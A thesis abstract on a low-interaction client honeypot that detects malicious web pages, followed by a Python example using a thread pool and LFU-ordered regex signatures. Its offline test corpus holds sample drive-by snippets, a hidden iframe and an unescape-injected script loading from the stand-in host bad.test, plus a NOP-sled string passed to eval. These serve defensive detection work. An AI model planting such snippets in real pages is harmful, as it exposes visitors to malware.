Research on a Honeypot System Based on Malicious Web Page Detection
Abstract
A honeypot is a well-known technique for discovering the tools, tactics and motives of attackers. It is a network security technology that emerged in recent years, developed from the idea of military deception, and its purpose is to be probed, attacked and compromised. Directly or indirectly, honeypots help protect production systems and networks against attackers, and the technology has played a major role in analysing phishing attacks and tracking botnets. As basic security measures such as firewalls and anti-virus engines have matured, attackers gain little through the traditional attack channels, so they have turned to client-side attacks: through this simpler and unprotected path they install malware on end users' machines and use it to collect sensitive information. To counter client-side attacks, a new type of honeypot, the client honeypot, has been proposed. Client honeypots crawl the network, interact with many servers, and classify those servers according to the malicious behaviour they exhibit.
     Following the client honeypot direction, this thesis studies a low-interaction client honeypot based on malicious web page detection. By analysing the design ideas and implementation mechanism of low-interaction client honeypots, it sets out the detailed structure and operation flow of each module and implements the system. In order to detect hidden malicious page code more reliably, the implementation is also improved with respect to the techniques that malicious web pages currently use.
     To address the unsatisfactory detection speed of low-interaction client honeypots, the thesis proposes a thread pool to raise the system's detection throughput; experiments show that the thread pool significantly improves detection speed. The thesis also draws on the idea of the least frequently used (LFU) page replacement algorithm from operating systems to propose a theoretical algorithm for a problem observed in the experiments: improving detection accuracy by adding signature matching rules slows the system's detection speed.
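The following example is added here to make the three mechanisms in the abstract concrete; it is not code from the thesis or from any honeypot project. It is a minimal low-interaction client honeypot pipeline: pages are fetched without being rendered or having their scripts executed, each body is scanned against a list of signature rules from a thread pool, and the rule list keeps an LFU-style hit counter so that the rules which match most often are tried first. The URLs, page bodies, rule names and regular expressions are all constructed for the demonstration (they are not real vendor signatures), and `fetch` reads from an in-memory corpus so that everything runs offline.

```python
import re
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed stand-in for the web: URL -> response body. In a real
# low-interaction client honeypot these bodies come from an HTTP client that
# retrieves pages without rendering them or executing their scripts.
SAMPLE_PAGES = {
    "http://example.test/index.html":
        "<html><body><p>Welcome</p></body></html>",
    "http://example.test/promo.html":
        "<html><body><script>document.write(unescape("
        "\"%3Cscript src='http://bad.test/x.js'%3E%3C/script%3E\"))"
        "</script></body></html>",
    "http://example.test/frame.html":
        "<html><body><iframe src=\"http://bad.test/a\" width=\"0\" "
        "height=\"0\" style=\"visibility:hidden\"></iframe></body></html>",
    "http://example.test/shell.html":
        "<html><script>var s = \"%u9090%u9090%u9090\"; eval(s);</script></html>",
    "http://example.test/about.html":
        "<html><body><p>About us</p></body></html>",
}

# Illustrative signatures (made up for this example): (name, compiled regex).
SIGNATURES = [
    ("hidden-iframe", re.compile(
        r'<iframe[^>]*(width="0"|height="0"|visibility:\s*hidden)', re.I)),
    ("unescape-document-write", re.compile(
        r'document\.write\s*\(\s*unescape\s*\(', re.I)),
    ("unicode-nop-sled", re.compile(r'(%u9090){2,}', re.I)),
    ("eval-of-string", re.compile(r'\beval\s*\(', re.I)),
]


def fetch(url):
    """Low-interaction fetch: return the raw body only, never execute it.
    Looks the URL up in the constructed corpus so the example runs offline."""
    return SAMPLE_PAGES.get(url, "")


class RuleSet:
    """Signature list with an LFU-style hit counter per rule. With
    adaptive=True the list is re-sorted after every hit so the rules that
    match most often are tried first; with adaptive=False the order is fixed,
    which is the baseline whose cost grows linearly with the number of rules."""

    def __init__(self, signatures, adaptive=True):
        self._rules = list(signatures)
        self._hits = {name: 0 for name, _ in signatures}
        self._adaptive = adaptive
        self._lock = threading.Lock()  # scans run concurrently in the pool

    def order(self):
        """Current rule names, most frequently hit first when adaptive."""
        with self._lock:
            return [name for name, _ in self._rules]

    def scan(self, body):
        """Return (first matching rule name or None, number of rules tried).
        Stopping at the first hit is enough for the honeypot's binary
        verdict (malicious / not malicious)."""
        with self._lock:
            rules = list(self._rules)  # snapshot so reordering is safe
        for tried, (name, regex) in enumerate(rules, start=1):
            if regex.search(body):
                self._record_hit(name)
                return name, tried
        return None, len(rules)

    def _record_hit(self, name):
        with self._lock:
            self._hits[name] += 1
            if self._adaptive:
                # Stable sort: ties keep their current relative order.
                self._rules.sort(key=lambda rule: -self._hits[rule[0]])


def patrol(urls, ruleset, workers=4):
    """Visit every URL concurrently and return {url: verdict}, where the
    verdict is the matching rule name or None for a page judged clean."""
    def visit(url):
        return url, ruleset.scan(fetch(url))[0]

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(visit, urls))


def rules_tried(urls, ruleset):
    """Total number of regex evaluations spent on a sequential run of urls;
    used to compare the fixed and the LFU-ordered rule sets."""
    return sum(ruleset.scan(fetch(url))[1] for url in urls)


if __name__ == "__main__":
    rules = RuleSet(SIGNATURES)
    for url, verdict in sorted(patrol(list(SAMPLE_PAGES), rules).items()):
        print(f"{'MALICIOUS' if verdict else 'clean':9} {url}  ({verdict})")
    print("rule order after patrol:", rules.order())
```

Two caveats worth keeping in mind when reading the abstract's results. The LFU ordering only saves work on pages that hit some rule: a clean page still has to be checked against every rule, so the gain from reordering depends on the malicious fraction of the crawl, while the thread pool speeds up both cases because fetching dominates. And because a low-interaction honeypot never executes the page, payloads assembled at run time by obfuscated script are invisible to static signatures unless the scanner is extended for them, which is the kind of improvement the abstract refers to.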
